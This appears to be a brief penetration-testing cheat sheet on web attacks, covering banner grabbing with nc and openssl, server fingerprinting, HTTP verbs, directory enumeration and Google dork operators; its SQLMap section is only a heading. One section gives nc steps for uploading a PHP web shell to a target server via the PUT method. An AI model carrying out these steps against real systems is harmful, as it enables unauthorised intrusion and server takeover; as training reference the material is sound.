Web Attacks

nc -v <target> <port>
HEAD / HTTP/1.0

HTTPS services

openssl s_client -connect <target>:<port>
HEAD / HTTP/1.0

Fingerpriting with Httprint

httprint -P0 -h <target> -s <signature file>

HTTP Verbs

GET, POST, HEAD, PUT, DELETE, OPTIONS

Using PUT to upload shell

# Get the content length of the shell
wc -m shell.php
<payload content length output>

# Then using nc to upload with the PUT method
nc <target> <port>
PUT /payload.php HTTP/1.0
Content-type: text/html
Content-length: <length of payload>

Directory and File Enumeration

Enumeration of files and directories can lead to many hidden resources that could contain:

  • New and untested features

  • Backup files

  • Testing information

  • Developer's notes

Google Dorks

Command
Meaning

site:

You can use this command to include only results on a given hostname.

intitle:

This command filters according to the title of a page.

inurl:

Similar to intitle, but works on the URL of a resource.

filetype:

This filters by using the file extension of a resource. For example .pdf or .xls.

AND, OR, &,

You can use logical operators to combine your expressions. For example: site:example.com OR site:another.com

-

You can use this character to filter out a keyword or a command's result from the query.

SQL Injection with SQLMap

Last updated

Was this helpful?